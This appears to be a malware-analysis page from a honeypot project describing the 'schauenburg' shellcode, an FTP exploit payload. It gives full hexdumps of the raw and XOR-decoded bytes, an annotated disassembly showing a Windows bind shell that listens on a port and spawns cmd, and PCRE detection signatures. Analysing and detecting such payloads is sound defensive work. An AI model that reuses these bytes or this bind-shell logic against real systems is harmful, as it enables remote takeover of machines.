schauenburg Shellcode

file csni:shellcodes:schauenburg:schauenburg.bin

hexdump

00000000  50 41 53 53 20 78 0a 50  4f 52 54 20 90 90 90 90  |PASS x.PORT ....|
00000010  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000110  90 90 90 90 90 90 90 eb  06 90 90 21 bf c0 77 e9  |...........!..w.|
00000120  13 fc ff ff 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000130  90 90 90 eb 0f 8b 34 24  33 c9 80 c1 dd 80 36 de  |......4$3.....6.|
00000140  46 e2 fa c3 e8 ec ff ff  ff ba b9 51 d8 de de 60  |F..........Q...`|
00000150  12 ce 60 a9 b6 ed ec de  de b6 a9 ad ec 81 8a 21  |..`............!|
00000160  cb 0e ce 60 a9 49 47 8c  8c 8c 8c 9c 8c 9c 8c 36  |...`.IG........6|
00000170  d5 de de de 89 8d 9f 8d  b1 bd b5 bb aa 9f de 89  |................|
00000180  21 c8 21 0e 4d b4 de b6  dc de fd d9 55 1a b4 ce  |!.!.M.......U...|
00000190  8e 8d 36 db de de de bc  b7 b0 ba de 89 21 c8 21  |..6..........!.!|
000001a0  0e b4 df 8d 36 d9 de de  de b2 b7 ad aa bb b0 de  |....6...........|
000001b0  89 21 c8 21 0e b4 de 8a  8d 36 d9 de de de bf bd  |.!.!.....6......|
000001c0  bd bb ae aa de 89 21 c8  21 0e 55 06 ed 1e b4 ce  |......!.!.U.....|
000001d0  87 55 22 89 dd 27 89 2d  75 55 e2 fa 8e 8e 8e b4  |.U"..'.-uU......|
000001e0  df 8e 8e 36 da de de de  bd b3 ba de 8e 36 d1 de  |...6.........6..|
000001f0  de de 9d ac bb bf aa bb  8e ac b1 bd bb ad ad 9f  |................|
00000200  de 18 d9 9a 19 99 f2 df  df de de 5d 19 e6 4d 75  |...........]..Mu|
00000210  75 75 ba b9 7f ee de 55  9e d2 55 9e c2 55 de 21  |uu.....U..U..U.!|
00000220  ae d6 21 c8 21 0e eb 90  90 90 90 90 90 90 90 90  |..!.!...........|
00000230  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000007d0  90 90 90 90 90 90 90 0a                           |........|
000007d8

hexdump

00000000  50 41 53 53 20 78 0a 50  4f 52 54 20 90 90 90 90  |PASS x.PORT ....|
00000010  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000110  90 90 90 90 90 90 90 eb  06 90 90 21 bf c0 77 e9  |.......ë...!¿Àwé|
00000120  13 fc ff ff 90 90 90 90  90 90 90 90 90 90 90 90  |.üÿÿ............|
00000130  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000140  90 90 90 90 90 90 90 90  90 64 67 8f 06 00 00 be  |.........dg....Ÿ|
00000150  cc 10 be 77 68 33 32 00  00 68 77 73 32 5f 54 ff  |Ì.Ÿwh32..hws2_Tÿ|
00000160  15 d0 10 be 77 97 99 52  52 52 52 42 52 42 52 e8  |.Ð.Ÿw..RRRRBRBRè|
00000170  0b 00 00 00 57 53 41 53  6f 63 6b 65 74 41 00 57  |....WSASocketA.W|
00000180  ff 16 ff d0 93 6a 00 68  02 00 23 07 8b c4 6a 10  |ÿ.ÿÐ.j.h..#..Äj.|
00000190  50 53 e8 05 00 00 00 62  69 6e 64 00 57 ff 16 ff  |PSè....bind.Wÿ.ÿ|
000001a0  d0 6a 01 53 e8 07 00 00  00 6c 69 73 74 65 6e 00  |Ðj.Sè....listen.|
000001b0  57 ff 16 ff d0 6a 00 54  53 e8 07 00 00 00 61 63  |Wÿ.ÿÐj.TSè....ac|
000001c0  63 65 70 74 00 57 ff 16  ff d0 8b d8 33 c0 6a 10  |cept.Wÿ.ÿÐ.Ø3Àj.|
000001d0  59 8b fc 57 03 f9 57 f3  ab 8b 3c 24 50 50 50 6a  |Y.üW.ùWó«.<$PPPj|
000001e0  01 50 50 e8 04 00 00 00  63 6d 64 00 50 e8 0f 00  |.PPè....cmd.Pè..|
000001f0  00 00 43 72 65 61 74 65  50 72 6f 63 65 73 73 41  |..CreateProcessA|
00000200  00 c6 07 44 c7 47 2c 01  01 00 00 83 c7 38 93 ab  |.Æ.DÇG,.....Ç8.«|
00000210  ab ab 64 67 a1 30 00 8b  40 0c 8b 40 1c 8b 00 ff  |««dg¡0..@..@...ÿ|
00000220  70 08 ff 16 ff d0 eb 90  90 90 90 90 90 90 90 90  |p.ÿ.ÿÐë.........|
00000230  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000007d0  90 90 90 90 90 90 90 0a                           |........|
000007d8

00000133                 jmp     short loc_144
00000135 ; ---------------------------------------------------------------------------

00000135
00000135 loc_135:
00000135                 mov     esi, [esp]
00000138                 xor     ecx, ecx
0000013A                 add     cl, 0DDh ; '¦'
0000013D
0000013D loc_13D:
0000013D                 xor     byte ptr [esi], 0DEh
00000140                 inc     esi
00000141                 loop    loc_13D
00000143                 retn
00000144 ; ---------------------------------------------------------------------------
00000144
00000144 loc_144:
00000144                 call    loc_135

00000149                 pop     dword ptr fs:0
0000014F                 mov     esi, 77BE10CCh  ; GetProcAddress
00000154                 push    '23'
00000159                 push    '_2sw'
0000015E                 push    esp
0000015F                 call    dword ptr ds:77BE10D0h ; LoadLibraryA
00000165                 xchg    eax, edi
00000166                 cdq
00000167                 push    edx
00000168                 push    edx
00000169                 push    edx
0000016A                 push    edx
0000016B                 inc     edx
0000016C                 push    edx
0000016D                 inc     edx
0000016E                 push    edx
0000016F                 call    loc_17F
0000016F ; ---------------------------------------------------------------------------
00000174 aWsasocketa     db 'WSASocketA',0

0000017F ; ---------------------------------------------------------------------------
0000017F
0000017F loc_17F:
0000017F                 push    edi
00000180                 call    dword ptr [esi] ; GetProcAddress WSASocketA
00000182                 call    eax
00000184                 xchg    eax, ebx
00000185                 push    0
00000187                 push    7230002h        ; port & type
0000018C                 mov     eax, esp
0000018E                 push    10h
00000190                 push    eax
00000191                 push    ebx
00000192                 call    loc_19C
00000192 ; ---------------------------------------------------------------------------
00000197 aBind           db 'bind',0
0000019C ; ---------------------------------------------------------------------------
0000019C
0000019C loc_19C:
0000019C                 push    edi
0000019D                 call    dword ptr [esi] ; GetProcAddress bind
0000019F                 call    eax
000001A1                 push    1
000001A3                 push    ebx
000001A4                 call    loc_1B0
000001A4 ; ---------------------------------------------------------------------------
000001A9 aListen         db 'listen',0
000001B0 ; ---------------------------------------------------------------------------
000001B0
000001B0 loc_1B0:
000001B0                 push    edi
000001B1                 call    dword ptr [esi] ; GetProcAddress listen
000001B3                 call    eax
000001B5                 push    0
000001B7                 push    esp
000001B8                 push    ebx
000001B9                 call    loc_1C5
000001B9 ; ---------------------------------------------------------------------------
000001BE aAccept         db 'accept',0
000001C5 ; ---------------------------------------------------------------------------
000001C5
000001C5 loc_1C5:
000001C5                 push    edi
000001C6                 call    dword ptr [esi] ; GetProcAddress accept
000001C8                 call    eax
000001CA                 mov     ebx, eax
000001CC                 xor     eax, eax
000001CE                 push    10h
000001D0                 pop     ecx
000001D1                 mov     edi, esp
000001D3                 push    edi
000001D4                 add     edi, ecx
000001D6                 push    edi
000001D7                 rep stosd
000001D9                 mov     edi, [esp]
000001DC                 push    eax
000001DD                 push    eax
000001DE                 push    eax
000001DF                 push    1
000001E1                 push    eax
000001E2                 push    eax
000001E3                 call    loc_1EC
000001E3 ; ---------------------------------------------------------------------------
000001E8 aCmd            db 'cmd',0
000001EC ; ---------------------------------------------------------------------------
000001EC
000001EC loc_1EC:
000001EC                 push    eax
000001ED                 call    loc_201
000001ED ; ---------------------------------------------------------------------------
000001F2 aCreateprocessa db 'CreateProcessA',0
00000201 ; ---------------------------------------------------------------------------
00000201
00000201 loc_201:
00000201                 mov     byte ptr [edi], 44h ; 'D'
00000204                 mov     dword ptr [edi+2Ch], 101h
0000020B                 add     edi, 38h ; '8'
0000020E                 xchg    eax, ebx
0000020F                 stosd
00000210                 stosd
00000211                 stosd
00000212                 mov     eax, fs:30h
00000217                 mov     eax, [eax+0Ch]
0000021A                 mov     eax, [eax+1Ch]
0000021D                 mov     eax, [eax]
0000021F                 push    dword ptr [eax+8]
00000222                 call    dword ptr [esi] ; GetProcAddress CreateProcessA
00000224                 call    eax

char *pcre = "(.*)(\\xEB\\x0F\\x8B\\x34\\x24\\x33\\xC9\\x80\\xC1(.)\\x80\\x36(.)\\x46\\xE2\\xFA\\xC3\\xE8\\xEC\\xFF\\xFF\\xFF)(.*)$",

char *pcre = "\\xBE\\xCC\\x10\\xBE\\x77\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5F\\x54"
"\\xFF\\x15\\xD0\\x10\\xBE\\x77\\x97\\x99\\x52\\x52\\x52\\x52\\x42\\x52\\x42\\x52"
"\\xE8\\x0B\\x00\\x00\\x00\\x57\\x53\\x41\\x53\\x6F\\x63\\x6B\\x65\\x74\\x41\\x00"
"\\x57\\xFF\\x16\\xFF\\xD0\\x93\\x6A\\x00\\x68\\x02\\x00(..)\\x8B\\xC4"
"\\x6A\\x10\\x50\\x53\\xE8\\x05\\x00\\x00\\x00\\x62\\x69\\x6E\\x64\\x00\\x57\\xFF"
"\\x16\\xFF\\xD0\\x6A\\x01\\x53\\xE8\\x07\\x00\\x00\\x00\\x6C\\x69\\x73\\x74\\x65"
"\\x6E\\x00\\x57\\xFF\\x16\\xFF\\xD0\\x6A\\x00\\x54\\x53\\xE8\\x07\\x00\\x00\\x00"
"\\x61\\x63\\x63\\x65\\x70\\x74\\x00\\x57\\xFF\\x16\\xFF\\xD0\\x8B\\xD8\\x33\\xC0"
"\\x6A\\x10\\x59\\x8B\\xFC\\x57\\x03\\xF9\\x57\\xF3\\xAB\\x8B\\x3C\\x24\\x50\\x50"
"\\x50\\x6A\\x01\\x50\\x50\\xE8\\x04\\x00\\x00\\x00\\x63\\x6D\\x64\\x00\\x50\\xE8"
"\\x0F\\x00\\x00\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x72\\x6F\\x63\\x65\\x73"
"\\x73\\x41\\x00\\xC6\\x07\\x44\\xC7\\x47\\x2C\\x01\\x01\\x00\\x00\\x83\\xC7\\x38"
"\\x93\\xAB\\xAB\\xAB\\x64\\x67\\xA1\\x30\\x00\\x8B\\x40\\x0C\\x8B\\x40\\x1C\\x8B"
"\\x00\\xFF\\x70\\x08\\xFF\\x16\\xFF\\xD0\\xEB";